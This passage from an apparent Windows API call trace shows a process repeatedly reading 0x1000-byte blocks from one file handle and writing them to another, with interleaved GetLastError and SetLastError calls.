hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.841] GetLastError () returned 0x0 [0095.841] SetLastError (dwErrCode=0x0) [0095.841] GetLastError () returned 0x0 [0095.841] SetLastError (dwErrCode=0x0) [0095.841] GetLastError () returned 0x0 [0095.841] SetLastError (dwErrCode=0x0) [0095.841] GetLastError () returned 0x0 [0095.841] SetLastError (dwErrCode=0x0) [0095.841] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.841] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.841] GetLastError () returned 0x0 [0095.842] SetLastError (dwErrCode=0x0) [0095.842] GetLastError () returned 0x0 [0095.842] SetLastError (dwErrCode=0x0) [0095.842] GetLastError () returned 0x0 [0095.842] SetLastError (dwErrCode=0x0) [0095.842] GetLastError () returned 0x0 [0095.842] SetLastError (dwErrCode=0x0) [0095.842] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.842] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.842] GetLastError () returned 0x0 [0095.842] SetLastError (dwErrCode=0x0) [0095.842] GetLastError () returned 0x0 [0095.842] SetLastError (dwErrCode=0x0) [0095.843] GetLastError () returned 0x0 [0095.843] SetLastError (dwErrCode=0x0) [0095.843] GetLastError () returned 0x0 [0095.843] SetLastError (dwErrCode=0x0) [0095.843] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.843] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.843] GetLastError () returned 0x0 [0095.843] SetLastError (dwErrCode=0x0) [0095.844] GetLastError () returned 0x0 [0095.844] SetLastError (dwErrCode=0x0) [0095.844] GetLastError () returned 0x0 [0095.844] SetLastError (dwErrCode=0x0) [0095.844] GetLastError () returned 0x0 [0095.844] SetLastError (dwErrCode=0x0) [0095.844] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.845] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.845] GetLastError () returned 0x0 [0095.845] SetLastError (dwErrCode=0x0) [0095.846] GetLastError () returned 0x0 [0095.846] SetLastError (dwErrCode=0x0) [0095.846] GetLastError () returned 0x0 [0095.846] SetLastError (dwErrCode=0x0) [0095.846] GetLastError () returned 0x0 [0095.846] SetLastError (dwErrCode=0x0) [0095.846] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.846] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.846] GetLastError () returned 0x0 [0095.846] SetLastError (dwErrCode=0x0) [0095.846] GetLastError () returned 0x0 [0095.846] SetLastError (dwErrCode=0x0) [0095.847] GetLastError () returned 0x0 [0095.847] SetLastError (dwErrCode=0x0) [0095.847] GetLastError () returned 0x0 [0095.847] SetLastError (dwErrCode=0x0) [0095.847] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.847] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.847] GetLastError () returned 0x0 [0095.847] SetLastError (dwErrCode=0x0) [0095.847] GetLastError () returned 0x0 [0095.847] SetLastError (dwErrCode=0x0) [0095.847] GetLastError () returned 0x0 [0095.847] SetLastError (dwErrCode=0x0) [0095.848] GetLastError () returned 0x0 [0095.848] SetLastError (dwErrCode=0x0) [0095.848] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.848] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.848] GetLastError () returned 0x0 [0095.848] SetLastError (dwErrCode=0x0) [0095.848] GetLastError () returned 0x0 [0095.848] SetLastError (dwErrCode=0x0) [0095.848] GetLastError () returned 0x0 [0095.848] SetLastError (dwErrCode=0x0) [0095.848] GetLastError () returned 0x0 [0095.848] SetLastError (dwErrCode=0x0) [0095.849] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.849] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.849] GetLastError () returned 0x0 [0095.849] SetLastError (dwErrCode=0x0) [0095.849] GetLastError () returned 0x0 [0095.849] SetLastError (dwErrCode=0x0) [0095.849] GetLastError () returned 0x0 [0095.849] SetLastError (dwErrCode=0x0) [0095.849] GetLastError () returned 0x0 [0095.849] SetLastError (dwErrCode=0x0) [0095.850] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.850] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.850] GetLastError () returned 0x0 [0095.850] SetLastError (dwErrCode=0x0) [0095.850] GetLastError () returned 0x0 [0095.850] SetLastError (dwErrCode=0x0) [0095.850] GetLastError () returned 0x0 [0095.850] SetLastError (dwErrCode=0x0) [0095.850] GetLastError () returned 0x0 [0095.850] SetLastError (dwErrCode=0x0) [0095.850] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.851] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.851] GetLastError () returned 0x0 [0095.851] SetLastError (dwErrCode=0x0) [0095.851] GetLastError () returned 0x0 [0095.851] SetLastError (dwErrCode=0x0) [0095.851] GetLastError () returned 0x0 [0095.851] SetLastError (dwErrCode=0x0) [0095.851] GetLastError () returned 0x0 [0095.851] SetLastError (dwErrCode=0x0) [0095.851] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.851] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.852] GetLastError () returned 0x0 [0095.852] SetLastError (dwErrCode=0x0) [0095.852] GetLastError () returned 0x0 [0095.852] SetLastError (dwErrCode=0x0) [0095.852] GetLastError () returned 0x0 [0095.852] SetLastError (dwErrCode=0x0) [0095.852] GetLastError () returned 0x0 [0095.852] SetLastError (dwErrCode=0x0) [0095.852] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.852] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.852] GetLastError () returned 0x0 [0095.853] SetLastError (dwErrCode=0x0) [0095.853] GetLastError () returned 0x0 [0095.853] SetLastError (dwErrCode=0x0) [0095.853] GetLastError () returned 0x0 [0095.853] SetLastError (dwErrCode=0x0) [0095.853] GetLastError () returned 0x0 [0095.853] SetLastError (dwErrCode=0x0) [0095.853] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.853] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.854] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] GetLastError () returned 0x0 [0095.854] SetLastError (dwErrCode=0x0) [0095.854] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.855] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.855] GetLastError () returned 0x0 [0095.855] SetLastError (dwErrCode=0x0) [0095.855] GetLastError () returned 0x0 [0095.855] SetLastError (dwErrCode=0x0) [0095.855] GetLastError () returned 0x0 [0095.855] SetLastError (dwErrCode=0x0) [0095.855] GetLastError () returned 0x0 [0095.855] SetLastError (dwErrCode=0x0) [0095.855] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.855] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.855] GetLastError () returned 0x0 [0095.855] SetLastError (dwErrCode=0x0) [0095.855] GetLastError () returned 0x0 [0095.855] SetLastError (dwErrCode=0x0) [0095.855] GetLastError () returned 0x0 [0095.855] SetLastError (dwErrCode=0x0) [0095.855] GetLastError () returned 0x0 [0095.856] SetLastError (dwErrCode=0x0) [0095.856] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.856] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.856] GetLastError () returned 0x0 [0095.856] SetLastError (dwErrCode=0x0) [0095.856] GetLastError () returned 0x0 [0095.856] SetLastError (dwErrCode=0x0) [0095.856] GetLastError () returned 0x0 [0095.856] SetLastError (dwErrCode=0x0) [0095.856] GetLastError () returned 0x0 [0095.856] SetLastError (dwErrCode=0x0) [0095.856] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.856] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.856] GetLastError () returned 0x0 [0095.856] SetLastError (dwErrCode=0x0) [0095.856] GetLastError () returned 0x0 [0095.856] SetLastError (dwErrCode=0x0) [0095.856] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.857] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.857] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.857] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.857] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.857] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.857] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.857] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.857] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.857] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.857] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.857] GetLastError () returned 0x0 [0095.857] SetLastError (dwErrCode=0x0) [0095.858] GetLastError () returned 0x0 [0095.858] SetLastError (dwErrCode=0x0) [0095.858] GetLastError () returned 0x0 [0095.858] SetLastError (dwErrCode=0x0) [0095.858] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.858] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.858] GetLastError () returned 0x0 [0095.858] SetLastError (dwErrCode=0x0) [0095.858] GetLastError () returned 0x0 [0095.858] SetLastError (dwErrCode=0x0) [0095.858] GetLastError () returned 0x0 [0095.858] SetLastError (dwErrCode=0x0) [0095.858] GetLastError () returned 0x0 [0095.858] SetLastError (dwErrCode=0x0) [0095.858] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.858] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.858] GetLastError () returned 0x0 [0095.858] SetLastError (dwErrCode=0x0) [0095.858] GetLastError () returned 0x0 [0095.859] SetLastError (dwErrCode=0x0) [0095.859] GetLastError () returned 0x0 [0095.859] SetLastError (dwErrCode=0x0) [0095.859] GetLastError () returned 0x0 [0095.859] SetLastError (dwErrCode=0x0) [0095.859] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.859] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.859] GetLastError () returned 0x0 [0095.859] SetLastError (dwErrCode=0x0) [0095.859] GetLastError () returned 0x0 [0095.859] SetLastError (dwErrCode=0x0) [0095.859] GetLastError () returned 0x0 [0095.859] SetLastError (dwErrCode=0x0) [0095.859] GetLastError () returned 0x0 [0095.859] SetLastError (dwErrCode=0x0) [0095.859] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.859] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.860] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] GetLastError () returned 0x0 [0095.860] SetLastError (dwErrCode=0x0) [0095.860] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.860] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.861] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] GetLastError () returned 0x0 [0095.861] SetLastError (dwErrCode=0x0) [0095.861] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.861] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.862] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] GetLastError () returned 0x0 [0095.862] SetLastError (dwErrCode=0x0) [0095.862] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.862] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.863] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] GetLastError () returned 0x0 [0095.863] SetLastError (dwErrCode=0x0) [0095.863] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.863] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.864] GetLastError () returned 0x0 [0095.864] SetLastError (dwErrCode=0x0) 